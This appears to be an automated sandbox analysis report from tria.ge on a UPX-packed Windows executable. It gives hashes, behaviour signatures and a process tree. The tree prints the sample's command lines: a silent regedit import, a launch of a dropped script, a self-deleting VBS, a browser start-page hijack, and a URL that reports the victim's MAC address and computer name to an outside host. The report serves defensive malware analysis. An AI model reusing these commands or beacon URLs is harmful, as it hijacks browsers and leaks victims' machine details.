Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    81s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/12/2022, 09:11

General

  • Target

    af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe

  • Size

    30KB

  • MD5

    04cc5225beb0b03bc052167e3c435dac

  • SHA1

    14c6851521168e856d53737cbda6300dac264c84

  • SHA256

    af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372

  • SHA512

    0d0017c50cbfc95caefc8b7287f234917a5da1575edca73003794464e975dca66e03be8ee4ba4e8dab7ef025018639577a5f94412d6f4a025f0e2378a0365c4a

  • SSDEEP

    768:cInEXNC2q64k1b67RHTSydVmTwKDfefY5n76:HEXN7J4QuRLVmTXeA5O

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe
    "C:\Users\Admin\AppData\Local\Temp\af9ce078f5ba3fc4cb8942c51bcb81dc22fe8d77e41327c89f598db1d1734372.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3388
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Program Files\Common Files\tk.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:4964
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\SysWow64\WScript.exe" "C:\Program Files\ylmqksqkr.wfoad"
      2⤵
      • Checks computer location settings
      • Drops file in Program Files directory
      • Modifies Internet Explorer settings
      • Modifies Internet Explorer start page
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4396
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.58lala.com/?bymf
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4584 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:4568
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4584 CREDAT:82950 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:5112
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=D2:A4:FF:92:97:12&a_cpname=XZIOFAVD&a_user=bymf&a_locip=0.0.0.0
      2⤵
      • Modifies Internet Explorer settings
      PID:3796
    • \??\c:\windows\SysWOW64\wscript.exe
      c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
      2⤵
        PID:4552

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\Common Files\tk.reg

      Filesize

      2KB

      MD5

      6c57b6990432447739eec4c670c2aa91

      SHA1

      4c0e3533c8dd61cf4e7ca1e156740cb7495af60b

      SHA256

      1f720aabb4ac49de9e16db9313761eff69dec381f3281dab12db58e89b242378

      SHA512

      0ad8d59b755245c2405b3983d57c73f1d3c18031a7c5f447d8ff38993311f9638b8cd3a6d30a0b560f0db635b55278dc5c0a28c34cd2c5b047abd75146e733e7

    • C:\Program Files\ylmqksqkr.wfoad

      Filesize

      43KB

      MD5

      347b04cc16fade324d1a8e82ab310c08

      SHA1

      8db9afbfe4c9f8d20621f1d4643d6b68580bb0b2

      SHA256

      76cc7ef716c4c9d2ae2b87fe52525f28507ced3f3c28141410492a73f70c28a1

      SHA512

      b694d6fd103370ca64718cd07c5eea89a90e76e85c8b4b662a3f9bae9116d1bbd98e638feafeb3e77f3a40d063f22eb2270198b2382eac9e4fcc10d1306559f8

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

      Filesize

      471B

      MD5

      a62e66dbd157955d60808bf89987bcde

      SHA1

      a97e8478902ac7db7fd904300304944a41afee8e

      SHA256

      d34e72ae586b00a60e3526f1e75677dcffa83fd33860a771ae592e7d8320cf25

      SHA512

      2c969c621bd5881acf47e85b3a2977b1c43dfa80887f0ab447327162d143795ff647b8ed1aec174a868c0faf1e09eb8baa6a67ea42764b65fe4416d2168e81fc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

      Filesize

      434B

      MD5

      124c4cc736be6895c14ef5a0b93c4c9f

      SHA1

      f28a787d82127b2b4dedd843fea6d0a9ac066438

      SHA256

      3af6faf020f547acb939b61f4cf7c55325a1de54fed5b82c1da2da0319e730ce

      SHA512

      b6868d6c8f4bedc13ff9709c2e08989868e8711fab2c367fa5280919685ee19f58a9d126e67eb773c627021908367c0f98847f696ff646e9b4dc72a63242d3fa

    • C:\Users\Admin\AppData\Local\Temp\Killme.vbs

      Filesize

      213B

      MD5

      89a5eb009655f63a6029e151d0897d45

      SHA1

      10b483443db34d04df59f225caf1d5b059728372

      SHA256

      eb84f76a2afcf0bad5be9825a1c58de74b74809b82f1f33a889de6983f1ca306

      SHA512

      7e1d0845d5bdc8b4fe81e701c055c46e22816d55328811ce22cf34aa5b30819a3878e00223f71e5dfd062269419a7f32bab010e5672b861ab5e440f706476e4b

    • memory/880-132-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/880-140-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

    • memory/880-142-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB